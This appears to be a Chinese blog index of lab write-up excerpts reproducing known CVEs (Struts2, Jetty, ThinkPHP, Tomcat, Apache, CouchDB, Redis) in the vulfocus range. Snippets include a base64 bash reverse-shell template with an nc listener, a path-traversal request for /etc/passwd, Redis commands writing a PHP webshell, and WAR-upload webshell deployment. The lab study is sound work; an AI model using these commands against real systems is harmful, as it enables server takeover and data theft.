漏洞复现
西蒙娜
这个作者很懒,什么都没留下…
展开
-
vulfocus 靶场struts2 代码执行 (CVE-2020-17530)
由于Struts2 会对某些标签属性(比如 id) 的属性值进行二次表达式解析,因此当这些标签属性中使用了 %{x} 且 x 的值用户可控时,用户即可构造一些SSRF、远程命令执行等形式的payload,并将这些恶意payload以%{...}形式传入该标签属性, 即可造成OGNL表达式执行。bash -c {echo,编码后的内容} |{base64 ,-d}|{bash , -i} #或: 抓包,改为如下内容: 红色部分为要更改的地方。监听机进行监听:nc -lvvp。原创 2024-04-24 10:33:50 · 954 阅读 · 2 评论 -
vulfocus靶场struts2 命令执行 CVE-2016-3081
后面接payload。Struts 2服务器上执行任意代码,取得网站服务器控制权。payload: 红色部分为可替换的执行命令。远程攻击者利用漏洞可。原创 2024-04-23 16:50:52 · 484 阅读 · 0 评论 -
vulfocus 靶场 jetty 敏感信息泄露 (CVE-2021-28169)
对于 <= 9.4.40、<= 10.0.2、<= 11.0.2 的 Eclipse Jetty 版本,对带有双重编码路径的 ConcatServlet 的请求可以访问 WEB-INF 目录中的受保护资源。例如,对 `/concat?/%2557EB-INF/web.xml` 的请求可以检索 web.xml 文件。这可能会泄露有关 Web 应用程序实施的敏感信息。对W进行编码为 %2557,访问:static?原创 2024-04-23 16:32:31 · 475 阅读 · 0 评论 -
vulfocus靶场thinkphp命令执行cve-2018-1002015
漏洞,该漏洞源于ThinkPHP在获取控制器名时未对用户提交的参数进行严格的过滤。远程攻击者可通过输入‘\’字符的方式调用任意方法利用该漏洞执行代码。thinkPHP 5.0.x版本和5.1.x版本中存在。使用工具: thinkphp综合利用工具,然后使用webshell工具进行连接即可。原创 2024-04-21 21:36:34 · 390 阅读 · 0 评论 -
kali搭建vulfocus靶场
运行成功,打开了浏览器:输入http://192.168.19.111:1212 打开登陆页面,默认的用户名和密码是admin 和 admin。docker run -d -p 映射端⼝:80 -v /var/run/docker.sock:/var/run/docker.sock。# docker version # 查看当前是否有docker,如果无docker ,则进行docker安装。映射端口是自己随意取的端口,IMAGE ID 就是刚刚docker images 命令查询出来的ID,原创 2024-04-20 16:28:39 · 572 阅读 · 1 评论 -
vulfocus靶场tomcat-cve_2017_12615 文件上传
攻击者将有可能可通过精心构造的攻击请求数据包向服务器上传包含任意代码的 JSP 的webshell文件,JSP文件中的恶意代码将能被服务器执行,导致服务器上的数据泄露或获取服务器权限。默认情况下readonly是true,此时PUT和DELETE方法是被拒绝的,当readonly为false时,便会开启。Windows上的Apache Tomcat如果开启PUT方法(默认关闭),则存在此漏洞,攻击者可以利用该漏洞上传JSP文件,从而导致远程代码执行。7.0.0-7.0.81 影响版本。原创 2024-04-19 19:26:54 · 283 阅读 · 0 评论 -
vulfocus靶场tomcat-pass-getshell 弱口令
连接: http://ip:port/目录/muma.jsp。哥斯拉:管理》生成〉javaDy> muma.jsp。通过弱口令登录后台,部署war包geshell。将生成的后门文件后缀名jsp改为war。上传文件:上传后会生成一个新的文件目录。登陆成功,上传恶意代码文件。原创 2024-04-19 18:21:09 · 291 阅读 · 0 评论 -
vulfocus靶场名称: apache-cve_2021_41773/apache-cve_2021_42013
Apache HTTP Server 2.4.49、2.4.50版本对路径规范化所做的更改中存在一个路径穿越漏洞,攻击者可利用该漏洞读取到Web目录外的其他文件,如系统配置文件、网站源码等,甚至在特定情况下,攻击者可构造恶意请求执行命令,控制服务器。目录遍历:GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd。1:get:在url后面加上。远程代码执行:bp抓包。原创 2024-04-19 11:57:29 · 593 阅读 · 0 评论 -
vulfocus靶场couchdb 权限绕过 (CVE-2017-12635)
应用广泛,如BBC用在其动态内容展示平台,Credit Suisse用在其内部的商品部门的市场框架,Meebo,用在其社交平台(web和应用程序)。在2017年11月15日,CVE-2017-12635和CVE-2017-12636披露,CVE-2017-12635是由于Erlang和JavaScript对JSON解析方式的不同,导致语句执行产生差异性导致的。数据改包前测试:登陆IP:IP:63073/_utils,出现登陆页面,输入用户名和密码,显示错误。点击New 点击 HTTP。原创 2024-04-18 19:04:16 · 428 阅读 · 0 评论 -
vulfocus靶场redis 未授权访问漏洞之CNVD-2015-07557
python3 redis-rogue-server.py --rhost 目标IP --rport 目标端口 --lhost 攻击者服务器IP。>" #向文件中写入内容。config set dbfilename 1.php #写入文件。主从复制getshell,写入恶意的so文件达到执行系统命令的目的。config set dir /tmp #创建临时目录。利用条件:需要web目录有读写权限,只有读权限会失败。证明web目录具有写权限,可以进行利用。原创 2024-04-18 14:03:06 · 666 阅读 · 0 评论 -
vulfocus靶场之redis命令执行cve-2022-0543漏洞复现
我们借助Lua沙箱中遗留的变量package的loadlib函数来加载动态链接库/usr/lib/x86_64-linux-gnu/liblua5.1.so.0里的导出函数luaopen_io。Debian以及Ubuntu发行版的源在打包Redis时,不慎在Lua沙箱中遗留了一个对象package,攻击者可以利用这个对象提供的方法加载动态链接库liblua里的函数,进而逃逸沙箱执行任意命令。Redis是著名的开源Key-Value数据库,其具备在沙箱中执行Lua脚本的能力。输入网址和端口,点击OK。原创 2024-04-18 11:37:29 · 858 阅读 · 4 评论